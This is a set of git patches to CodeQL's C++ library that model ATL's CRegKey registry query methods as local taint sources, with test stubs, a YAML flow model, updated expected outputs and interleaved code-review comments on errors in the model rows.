Pedersen Date: Wed, 27 Nov 2024 15:40:37 +0000 Subject: [PATCH 0749/1267] C++: Add failing tests for 'CRegKey'. --- .../dataflow/source-sink-tests/atl.cpp | 172 ++++++++++++++++++ 1 file changed, 172 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 35698f13e84..e8fbcbf9660 100644 
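Review bot: The QLDoc on `class CAtlTemporaryFile` names the wrong class: it says "The `CAtlFile` class from Microsoft's Active Template Library", which looks copied from CAtlFile.qll. It should read "The `CAtlTemporaryFile` class from Microsoft's Active Template Library." so generated documentation and hover text point at the right type. As in CAtlFile.qll, the description `"string read by " + this.getName()` would be more accurate as `"data read by " + this.getName()`, since `Read` fills an `LPVOID` buffer with file bytes.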
--- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp 
@@ -215,3 +215,175 @@ void test_CAtlTemporaryFile() { DWORD bytesRead; file.Read(buffer, 1024, bytesRead); // $ local_source } + +struct CRegKey { + CRegKey() throw(); + CRegKey(CRegKey& key) throw(); + explicit CRegKey(HKEY hKey) throw(); + CRegKey(CAtlTransactionManager* pTM) throw(); + + ~CRegKey() throw(); + void Attach(HKEY hKey) throw(); + LONG Close() throw(); + + LONG Create( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + LPTSTR lpszClass, + DWORD dwOptions, + REGSAM samDesired, + LPSECURITY_ATTRIBUTES lpSecAttr, + LPDWORD lpdwDisposition) throw(); + + LONG DeleteSubKey(LPCTSTR lpszSubKey) throw(); + LONG DeleteValue(LPCTSTR lpszValue) throw(); + HKEY Detach() throw(); + + LONG EnumKey( + DWORD iIndex, + LPTSTR pszName, + LPDWORD pnNameLength, + FILETIME* pftLastWriteTime) throw(); + + LONG Flush() throw(); + + LONG GetKeySecurity( + SECURITY_INFORMATION si, + PSECURITY_DESCRIPTOR psd, + LPDWORD pnBytes) throw(); + + LONG NotifyChangeKeyValue( + BOOL bWatchSubtree, + DWORD dwNotifyFilter, + HANDLE hEvent, + BOOL bAsync) throw(); + + LONG Open( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + REGSAM samDesired) throw(); + + LONG QueryBinaryValue( + LPCTSTR pszValueName, + void* pValue, + ULONG* pnBytes) throw(); + + LONG QueryDWORDValue( + LPCTSTR pszValueName, + DWORD& dwValue) throw(); + + LONG QueryGUIDValue( + LPCTSTR pszValueName, + GUID& guidValue) throw(); + + LONG QueryMultiStringValue( + LPCTSTR pszValueName, + LPTSTR pszValue, + ULONG* pnChars) throw(); + + LONG QueryQWORDValue( + LPCTSTR pszValueName, + ULONGLONG& qwValue) throw(); + + LONG QueryStringValue( + LPCTSTR pszValueName, + LPTSTR pszValue, + ULONG* pnChars) throw(); + + LONG QueryValue( + LPCTSTR pszValueName, + DWORD* pdwType, + void* pData, + ULONG* pnBytes) throw(); + + LONG QueryValue( + DWORD& dwValue, + LPCTSTR lpszValueName); + + LONG QueryValue( + LPTSTR szValue, + LPCTSTR lpszValueName, + DWORD* pdwCount); + + LONG RecurseDeleteKey(LPCTSTR lpszKey) throw(); + + LONG SetBinaryValue( + 
LPCTSTR pszValueName, + const void* pValue, + ULONG nBytes) throw(); + + LONG SetDWORDValue(LPCTSTR pszValueName, DWORD dwValue) throw(); + + LONG SetGUIDValue(LPCTSTR pszValueName, REFGUID guidValue) throw(); + + LONG SetKeySecurity(SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd) throw(); + + LONG SetKeyValue( + LPCTSTR lpszKeyName, + LPCTSTR lpszValue, + LPCTSTR lpszValueName) throw(); + + LONG SetMultiStringValue(LPCTSTR pszValueName, LPCTSTR pszValue) throw(); + + LONG SetQWORDValue(LPCTSTR pszValueName, ULONGLONG qwValue) throw(); + + LONG SetStringValue( + LPCTSTR pszValueName, + LPCTSTR pszValue, + DWORD dwType) throw(); + + LONG SetValue( + LPCTSTR pszValueName, + DWORD dwType, + const void* pValue, + ULONG nBytes) throw(); + + static LONG SetValue( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + LPCTSTR lpszValue, + LPCTSTR lpszValueName); + + LONG SetValue( + DWORD dwValue, + LPCTSTR lpszValueName); + + LONG SetValue( + LPCTSTR lpszValue, + LPCTSTR lpszValueName, + bool bMulti, + int nValueLen); + + operator HKEY() const throw(); + CRegKey& operator= (CRegKey& key) throw(); + + HKEY m_hKey; +}; + +void test_CRegKey() { + CRegKey key; + char data[1024]; + ULONG bytesRead; + key.QueryBinaryValue("foo", data, &bytesRead); // $ MISSING: local_source + + DWORD value; + key.QueryDWORDValue("foo", value); // $ MISSING: local_source + + GUID guid; + key.QueryGUIDValue("foo", guid); // $ MISSING: local_source + + key.QueryMultiStringValue("foo", data, &bytesRead); // $ MISSING: local_source + + ULONGLONG qword; + key.QueryQWORDValue("foo", qword); // $ MISSING: local_source + + key.QueryStringValue("foo", data, &bytesRead); // $ MISSING: local_source + + key.QueryValue(data, "foo", &bytesRead); // $ MISSING: local_source + + DWORD type; + key.QueryValue("foo", &type, data, &bytesRead); // $ MISSING: local_source + + DWORD value2; + key.QueryValue(value2, "foo"); // $ MISSING: local_source +} \ No newline at end of file 
From d69de0cc761fe1739962fb8277eb4a8c4afe5748 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:43:39 +0000 Subject: [PATCH 0750/1267] C++: Add a MaD model for 'CRegKey' and mark query calls as local flow sources. --- cpp/ql/lib/ext/CRegKey.model.yml | 19 ++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../cpp/models/implementations/CRegKey.qll | 87 +++++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 18 ++-- 4 files changed, 116 insertions(+), 9 deletions(-) create mode 100644 cpp/ql/lib/ext/CRegKey.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml new file mode 100644 index 00000000000..52b742029ac --- /dev/null +++ b/cpp/ql/lib/ext/CRegKey.model.yml 
@@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CRegKey", True, "CRegKey", "(CRegKey&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(DWORD&,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index cd86b53f90e..83bda3e2a44 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll 
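Review bot: The last three rows put the operator in the signature column and leave `QueryValue` in the name column (`"QueryValue", "operator HKEY"` and twice `"QueryValue", "operator="`), so they describe no member of `CRegKey` and the intended flows through `operator HKEY` and `operator=` are presumably never applied. Following the `operator=` row in CAtlFileMappingBase.model.yml, the first should read `["", "CRegKey", True, "operator HKEY", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]`, with the same shape for the two `operator=` rows. The string rows use `Argument[**1]` and `Argument[**0]` while CRegKey.qll marks the same buffers with `isParameterDeref(1)`, a single indirection, and `LPTSTR` is `char *` in the stub, so `*1` / `*0` looks like the intended level; worth confirming. There is also no summary row for `QueryGUIDValue`, and the file ends without a trailing newline.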
@@ -56,3 +56,4 @@ private import implementations.CPathT private import implementations.CAtlFile private import implementations.CAtlFileMapping private import implementations.CAtlTemporaryFile +private import implementations.CRegKey diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll new file mode 100644 index 00000000000..e6d1a5ba09e --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll 
@@ -0,0 +1,87 @@ +private import cpp +private import semmle.code.cpp.models.interfaces.FlowSource +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** The `CRegKey` class from the Microsoft "Active Template Library". */ +class CRegKey extends Class { + CRegKey() { this.hasGlobalName("CRegKey") } +} + +module CRegKey { + /** The `m_hKey` member on a object of type `CRegKey`. */ + class MhKey extends Field { + MhKey() { + this.getDeclaringType() instanceof CRegKey and + this.getName() = "m_hKey" + } + } + + private class MhKeyPathTaintInheritingContent extends TaintInheritingContent, + DataFlow::FieldContent + { + MhKeyPathTaintInheritingContent() { this.getField() instanceof MhKey } + } + + private class CRegKeyMemberFunction extends MemberFunction { + string name; + + CRegKeyMemberFunction() { this.getClassAndName(name) instanceof CRegKey } + } + + abstract private class CRegKeyFlowSource extends CRegKeyMemberFunction, LocalFlowSourceFunction { + FunctionOutput output; + + final override predicate hasLocalFlowSource(FunctionOutput output_, string description) { + output_ = output and + description = "registry string read by " + name + } + } + + /** The `CRegKey::QueryBinaryValue` function from Win32. */ + class QueryBinaryValue extends CRegKeyFlowSource { + QueryBinaryValue() { name = "QueryBinaryValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryDWORDValue` function from Win32. */ + class QueryDwordValue extends CRegKeyFlowSource { + QueryDwordValue() { name = "QueryDWORDValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryGUIDValue` function from Win32. */ + class QueryGuidValue extends CRegKeyFlowSource { + QueryGuidValue() { name = "QueryGUIDValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryMultiStringValue` function from Win32. 
*/ + class QueryMultiStringValue extends CRegKeyFlowSource { + QueryMultiStringValue() { name = "QueryMultiStringValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryQWORDValue` function from Win32. */ + class QueryQwordValue extends CRegKeyFlowSource { + QueryQwordValue() { name = "QueryQWORDValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryStringValue` function from Win32. */ + class QueryStringValue extends CRegKeyFlowSource { + QueryStringValue() { name = "QueryStringValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryValue` function from Win32. */ + class QueryValue extends CRegKeyFlowSource { + QueryValue() { + name = "QueryValue" and + ( + this.getNumberOfParameters() = 4 and + output.isParameterDeref(2) + or + this.getNumberOfParameters() = 2 and + output.isParameterDeref(0) + or + this.getNumberOfParameters() = 3 and + output.isParameterDeref(0) + ) + } + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index e8fbcbf9660..7df5e3dc1a0 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp 
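Review bot: `CRegKeyFlowSource` labels every source as `"registry string read by " + name`, but `QueryBinaryValue`, `QueryDWORDValue`, `QueryQWORDValue` and `QueryGUIDValue` yield non-string registry data; `description = "registry value read by " + name` would be accurate for all seven classes. The QLDoc on each of those classes says "function from Win32", whereas these are member functions of ATL's `CRegKey`, as the QLDoc on the `CRegKey` class itself states. In `QueryValue` the three disjuncts select the overload by parameter count alone, so a short comment mapping 4, 2 and 3 parameters to the output buffer index would make the choice of `isParameterDeref(2)` versus `isParameterDeref(0)` checkable against the header. `MhKeyPathTaintInheritingContent` carries a stray `Path` in its name.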
@@ -364,26 +364,26 @@ void test_CRegKey() { CRegKey key; char data[1024]; ULONG bytesRead; - key.QueryBinaryValue("foo", data, &bytesRead); // $ MISSING: local_source + key.QueryBinaryValue("foo", data, &bytesRead); // $ local_source DWORD value; - key.QueryDWORDValue("foo", value); // $ MISSING: local_source + key.QueryDWORDValue("foo", value); // $ local_source GUID guid; - key.QueryGUIDValue("foo", guid); // $ MISSING: local_source + key.QueryGUIDValue("foo", guid); // $ local_source - key.QueryMultiStringValue("foo", data, &bytesRead); // $ MISSING: local_source + key.QueryMultiStringValue("foo", data, &bytesRead); // $ local_source ULONGLONG qword; - key.QueryQWORDValue("foo", qword); // $ MISSING: local_source + key.QueryQWORDValue("foo", qword); // $ local_source - key.QueryStringValue("foo", data, &bytesRead); // $ MISSING: local_source + key.QueryStringValue("foo", data, &bytesRead); // $ local_source - key.QueryValue(data, "foo", &bytesRead); // $ MISSING: local_source + key.QueryValue(data, "foo", &bytesRead); // $ local_source DWORD type; - key.QueryValue("foo", &type, data, &bytesRead); // $ MISSING: local_source + key.QueryValue("foo", &type, data, &bytesRead); // $ local_source DWORD value2; - key.QueryValue(value2, "foo"); // $ MISSING: local_source + key.QueryValue(value2, "foo"); // $ local_source } \ No newline at end of file From 19e7c3776049a71101397e5fde8156969e932d66 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:47:29 +0000 Subject: [PATCH 0751/1267] C++: Update the final test changes. Nothing exciting here. --- .../dataflow/external-models/flow.expected | 10 +- .../external-models/validatemodels.expected | 14 +- .../taint-tests/test_mad-signatures.expected | 848 ++++++++++++++++++ 3 files changed, 861 insertions(+), 11 deletions(-) 
diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index d1e895f2eaf..3c5b69b09f4 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:819 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:817 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:818 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:809 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:807 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:808 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:818 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:808 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:819 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:809 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index b0276013106..166d834ea76 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected 
@@ -5,23 +5,25 @@ | Dubious member name "operator LPSTR" in summary model. | | Dubious member name "operator LPWSTR" in summary model. | | Dubious member name "operator PCXSTR" in summary model. | -| Dubious member name "operator StringType&" in summary model. | -| Dubious member name "operator T*" in summary model. | -| Dubious member name "operator const StringType&" in summary model. | | Dubious member name "operator&" in summary model. | | Dubious member name "operator*" in summary model. | | Dubious member name "operator+=" in summary model. | | Dubious member name "operator->" in summary model. | | Dubious member name "operator=" in summary model. | | Dubious member name "operator[]" in summary model. | +| Dubious signature "(CAtlFile &)" in summary model. | | Dubious signature "(CRegKey&)" in summary model. | | Dubious signature "(DWORD&,LPCTSTR)" in summary model. | | Dubious signature "(InputIterator,InputIterator,const Allocator &)" in summary model. | +| Dubious signature "(LPCTSTR,DWORD *,void *,ULONG *)" in summary model. | +| Dubious signature "(LPTSTR,LPCTSTR,DWORD *)" in summary model. | | Dubious signature "(const CComBSTR&)" in summary model. | +| Dubious signature "(const CComSafeArray &)" in summary model. | | Dubious signature "(const CComSafeArray&)" in summary model. | -| Dubious signature "(const SAFEARRAY&)" in summary model. | -| Dubious signature "(const SAFEARRAY*)" in summary model. | -| Dubious signature "(const SAFEARRAYBOUND*, UINT)" in summary model. | +| Dubious signature "(const SAFEARRAY &)" in summary model. | +| Dubious signature "(const SAFEARRAY *)" in summary model. | +| Dubious signature "(const SAFEARRAYBOUND *,UINT)" in summary model. | +| Dubious signature "(const T &,BOOL)" in summary model. | | Dubious signature "(const deque &)" in summary model. | | Dubious signature "(const deque &,const Allocator &)" in summary model. | | Dubious signature "(const forward_list &)" in summary model. | 
diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected
index 26031f42c0a..1f84cd3379a 100644
--- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected
+++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected
@@ -1,4 +1,90 @@ signatureMatches +| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:69:3:69:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:256:3:256:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:256:3:256:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:418:11:418:16 | Append | (wchar_t) | CComBSTR | Append | 0 | +| atl.cpp:419:11:419:16 | Append | (char) | CComBSTR | Append | 0 | +| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:424:11:424:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | 
operator= | 0 | +| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | +| atl.cpp:437:8:437:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | +| atl.cpp:438:8:438:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:438:8:438:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | +| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | +| atl.cpp:762:8:762:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:762:8:762:10 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:762:8:762:10 | Add | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:762:8:762:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:762:8:762:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:762:8:762:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:762:8:762:10 | Add | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:762:8:762:10 | Add | (vector &&,const 
Allocator &) | vector | vector | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:773:8:773:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:773:8:773:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex 
| (size_type,const T &,const Allocator &) | vector | vector | 2 | +| atl.cpp:839:15:839:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:840:15:840:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:841:15:841:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:844:15:844:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:845:15:845:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:846:15:846:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| standalone_iterators.cpp:103:27:103:36 | operator+= | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| stl.h:165:8:165:16 | push_back | (char) | CComBSTR | Append | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 1 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 1 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 1 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | forward_list | assign | 0 | 
@@ -7,6 +93,14 @@ signatureMatches | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | list | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | forward_list | assign | 0 | 
